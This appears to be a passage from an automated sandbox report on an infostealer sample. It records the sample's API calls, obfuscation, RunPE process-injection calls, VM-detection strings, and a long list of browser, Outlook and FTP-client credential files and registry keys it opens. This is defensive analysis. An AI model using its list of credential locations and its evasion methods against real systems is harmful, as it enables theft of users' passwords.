Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: mlang.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: samlib.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: AxgZVzUv8m.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: AxgZVzUv8m.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: G:\Projects\DLL3\DLL3\obj\Release\Dll.pdb source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: AxgZVzUv8m.exe, u9lljp7Y7HXWgkndHZQxcfD.cs | .Net Code: Main System.AppDomain.Load(byte[])
          Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA, 3_2_00410065
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00419968 push eax; ret 3_2_00419977
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00419BD9 pushfd ; iretd 3_2_00419C21
          Source: AxgZVzUv8m.exe | Static PE information: section name: .text entropy: 7.65846150249695
          Source: AxgZVzUv8m.exe, u9lljp7Y7HXWgkndHZQxcfD.cs | High entropy of concatenated method names: 'ho5X5G', 'svOSV', 'dXXuETrOqCXcXUN8', 'VkjCGKA3mdUyBZyDT', 'pCp0VVT', 'xUhE1Es3efdj0S1BQP8eh', 'kzrNtUB', 'Ui30TgcDkwD', 'AI6EK0dC', 'Vc6lFW57jKEegS0nxkWQ'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File dump: 7041625.bat.3.dr 3880EEB1C736D853EB13B44898B718AB
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Memory allocated: A30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Memory allocated: 26C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Memory allocated: 46C0000 memory commit | memory reserve | memory write watch
          Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 9583
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 3_2_004051E3
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 3_2_004041A6
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 3_2_00404E73
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 3_2_00408AE5
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 3_2_00409832
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 3_2_00408961
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_004045FD
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | API call chain: ExitProcess graph end node graph_3-8791
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | API call chain: ExitProcess graph end node graph_3-8652
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | API call chain: ExitProcess graph end node graph_3-8442
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA, 3_2_00410065
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040F984 mov eax, dword ptr fs:[00000030h] 3_2_0040F984
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf, 3_2_004105D6
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Memory written: C:\Users\user\Desktop\AxgZVzUv8m.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,741D1B10,ImpersonateLoggedOnUser,RevertToSelf,CloseHandle, 3_2_0041032D
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 3_2_004044D2
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_004045FD
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0041051E OleInitialize,GetUserNameA, 3_2_0041051E
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 3_2_004045FD

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SiteDesigner\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\RhinoSoft.com\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\TurboFTP
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\LeapWare\LeapFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GPSoftware\Directory Opus\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\AceBIT\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FTPGetter\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\AceBIT
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FTPInfo\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FileZilla\filezilla.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\BitKinex\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SharedSettings.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FileZilla\recentservers.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\BlazeFtp\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FlashFXP\4\Sites.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\TurboFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FTPInfo\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\INSoftware\NovaFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FTP Explorer\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FTPGetter\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\Frigate3\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SmartFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\Frigate3\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FileZilla\sitemanager.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\TurboFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\SmartFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\NetSarang\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FlashFXP\3\Quick.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\Estsoft\ALFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\ExpanDrive\drives.js
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\TurboFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\BitKinex\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\FTPRush\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\BitKinex\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\FlashFXP\3\Sites.dat
